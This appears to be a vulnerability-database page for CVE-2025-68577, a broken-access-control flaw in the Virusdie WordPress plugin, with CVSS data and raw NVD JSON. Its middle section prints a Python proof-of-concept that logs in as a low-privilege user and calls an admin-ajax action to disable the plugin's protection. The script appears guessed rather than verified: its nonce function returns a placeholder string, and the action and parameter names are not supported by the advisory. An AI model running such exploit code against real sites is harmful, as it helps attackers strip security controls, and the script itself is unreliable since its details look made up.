Security Vulnerability Report
中文
CVE-2025-68577 CVSS 4.3 MEDIUM

CVE-2025-68577

Published: 2025-12-24 13:16:25
Last Modified: 2026-04-27 19:16:33

Description

Missing Authorization vulnerability in Virusdie Virusdie virusdie allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Virusdie: from n/a through <= 1.1.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Virusdie WordPress插件 <= 1.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68577 PoC - Missing Authorization in Virusdie WordPress Plugin # Target: WordPress site with Virusdie plugin <= 1.1.6 TARGET_URL = "http://target-wordpress-site.com" # Low-privilege user credentials (subscriber/contributor role) USERNAME = "low_priv_user" PASSWORD = "password123" def get_nonce(cookies): """Extract WordPress nonce for authenticated requests""" response = requests.get(f"{TARGET_URL}/wp-admin/", cookies=cookies) # Extract nonce from page content if needed return "extracted_nonce" def exploit(): """Exploit missing authorization vulnerability""" # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'testcookie': '1' } resp = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Authentication failed") return False print("[+] Authenticated successfully with low-privilege account") # Step 2: Exploit missing authorization - access admin function # This endpoint should require admin privileges but doesn't exploit_data = { 'action': 'virusdie_admin_action', 'nonce': get_nonce(session.cookies), 'subaction': 'disable_protection', 'parameter': 'value' } exploit_resp = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data ) if exploit_resp.status_code == 200: print("[+] Exploitation successful - accessed privileged function") print(f"[+] Response: {exploit_resp.text}") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68577", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.777", "lastModified": "2026-04-27T19:16:32.573", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Virusdie Virusdie virusdie allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Virusdie: from n/a through <= 1.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}